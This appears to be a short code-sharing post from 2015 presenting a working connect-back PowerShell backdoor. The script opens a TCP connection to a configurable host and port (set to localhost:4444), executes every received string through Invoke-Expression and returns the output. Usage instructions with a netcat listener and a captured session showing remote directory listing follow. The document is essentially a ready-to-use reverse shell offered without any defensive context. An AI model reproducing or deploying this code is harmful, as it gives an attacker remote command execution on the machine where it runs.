metavoid
11/17/2015 - 1:43 PM

connect-back PowerShell backdoor

connect-back PowerShell backdoor

$addr = "localhost"
$port = 4444

$client = New-Object System.Net.Sockets.TcpClient ($addr, $port)
$stream = $client.GetStream()
$buffer = New-Object System.Byte[] $client.ReceiveBufferSize
$enc = New-Object System.Text.AsciiEncoding

try {
    while ($TRUE) {
        $bytes = $stream.Read($buffer, 0, $buffer.length)
        if ($bytes -eq 0) {
            break
        }
        $result = Invoke-Expression $enc.GetString($buffer, 0, $bytes) | Out-String
        $result = $enc.GetBytes($result)
        $stream.Write($result, 0, $result.length)
    }
} catch {
    # ignore exceptions
} finally {
    $stream.Close()
}

$client.Close()
On client:
>powershell -ex remotesigned .\psbackdoor.ps1

On server:
$ nc -l 4444
pwd

Path
----
C:\cygwin64\tmp


ls


    ??????: C:\cygwin64\tmp


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        2015/11/17     22:33        838 psbackdoor.ps1


exit